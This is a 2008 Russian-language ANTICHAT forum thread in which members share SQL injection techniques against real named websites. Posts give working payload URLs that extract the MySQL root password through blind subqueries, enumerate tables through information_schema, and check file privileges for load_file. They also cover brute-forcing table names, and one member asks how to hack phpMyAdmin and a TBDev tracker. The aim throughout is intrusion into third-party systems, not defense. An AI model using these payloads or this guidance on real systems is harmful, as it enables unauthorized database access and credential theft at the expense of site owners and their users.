HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.04.2008, 09:59
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

lsass.exe
а что толку от этого?

тут аналогичная канитель(
http://www.americanmap.com/catalog/browse.php?root_id=24&cat_id=-1+union+select+77777777777777777/*

вроде столбцов один, но ничего не получается

Последний раз редактировалось truelamer; 06.04.2008 в 10:10..
 
Ответить с цитированием

  #2  
Старый 06.04.2008, 10:11
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

хз пробуй подзапросы

пример http://mqup.mcgill.ca/book.php?bookid=1%20AND%20ascii(lower(substring((S ELECT%20password%20from%20mysql.user%20WHERE%20use r=%22root%22%20LIMIT%201),1,1)))%3E48


Error executing the SQL Query : SELECT * FROM books WHERE ID = 1 AND ascii(lower(substring((SELECT password from mysql.user WHERE user="root" LIMIT 1),1,1)))>48
Error : 1142 SELECT command denied to user 'mqup'@'localhost' for table 'user'
 
Ответить с цитированием

  #3  
Старый 06.04.2008, 11:22
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

xcedz
Спасибо за совет с подзапросами

таким способом узнал
что версия скулы 5
http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring(version(),1, 1))='5'

что есть таблица authors
http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring((select+tabl e_name+from+information_schema.tables+limit+17,1), 1,1))='a'
....

итд

Все понял буду знать!
 
Ответить с цитированием

  #4  
Старый 06.04.2008, 14:44
Lidloses_Auge
Новичок
Регистрация: 04.01.2008
Сообщений: 6
Провел на форуме:
24208

Репутация: 21
По умолчанию

Hi,
what do you do, if you get a SQL Injection, and the version() is < 5.0 ?
If < 5.0 there isn't any Information_Schema. Do you just guess the right table/column names?
Load_File is a possibility too, but it doesn't work each time.

Thank you
 
Ответить с цитированием

  #5  
Старый 06.04.2008, 15:09
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от Lidloses_Auge  
Do you just guess the right table/column names?
There's no another way to check if a table with current name exists.
For instance u can write a script which will check them one by one from a dictionary as the chance of some tables' with default names existance is rather high.
 
Ответить с цитированием

  #6  
Старый 06.04.2008, 14:57
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

Lidloses_Auge
If I'm not mistaken there is no other way to get some information. You can use lists of table names it'll be like a b-forse)))
look here for table base
http://forum.antichat.ru/nextnewesttothread49622.html
 
Ответить с цитированием

  #7  
Старый 07.04.2008, 07:29
ikolla$$
Banned
Регистрация: 06.04.2008
Сообщений: 107
Провел на форуме:
890872

Репутация: 127
Отправить сообщение для ikolla$$ с помощью ICQ
По умолчанию

Кароче.Возможно повторп,но прошу не пинать.
Есть 2 вопроса:
1)Как можно ломануть phpmyadmin;
2)Есть трекер.Движко TBDev.Там,на трекере есть папка с файлом дампа Базы Данных.ЕЕ надо удалять после устаовки.Но ее не удалили. помоему там есть права на запись,хотя могу ошбатсо.НУ чем ето может помочь?И вообще кто-нибудь знает как ломать ети двиги?

-----пример-----
http://deniska.ath.cx/ - только помоему рабаотает после 14.00
 
Ответить с цитированием

  #8  
Старый 06.04.2008, 17:15
Lidloses_Auge
Новичок
Регистрация: 04.01.2008
Сообщений: 6
Провел на форуме:
24208

Репутация: 21
По умолчанию

I'm just searching for more possibilities of using an injection like:

load_file
benchmark
ascii(lowerstring(substring ....
information_schema
into dumpfile

you know more interesting ways?
 
Ответить с цитированием

  #9  
Старый 06.04.2008, 18:04
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

Подскажите мне пожалуйста вот когда я использую load_file() я могу сделать так - load_file('/index.php')? и если я так сделаю то я увижу исходник страницы?

И как вообще узнать что эта функция работает? только если то что я в ней указал вылезит на экран так?
 
Ответить с цитированием

  #10  
Старый 06.04.2008, 20:45
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от truelamer  
Подскажите мне пожалуйста вот когда я использую load_file() я могу сделать так - load_file('/index.php')? и если я так сделаю то я увижу исходник страницы?

И как вообще узнать что эта функция работает? только если то что я в ней указал вылезит на экран так?
увидишь, только если в корне есть файл index.php (он там нафиг не нужен)
В качестве аргумента в эту функцию надо передавать реальный путь, а не относительный (можно конечно и относительный, но толку в этом немного, так как тогда нужно будет указывать путь относительно каталога файлов mysql сервера)

узнать есть ли файловые привилегии у пользователя можно например так:
Код:
union select file_priv from mysql.user where user=left(user(),locate(0x40,user())-1)/*
но это только если есть доступ к mysql.user

если нет то только с помошью анализа результата функции, все неудобство в том, что если файла не существует или есть ограничения на чтение файла (например права доступа) то функция возвращает null а не выплевывает ошибки
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ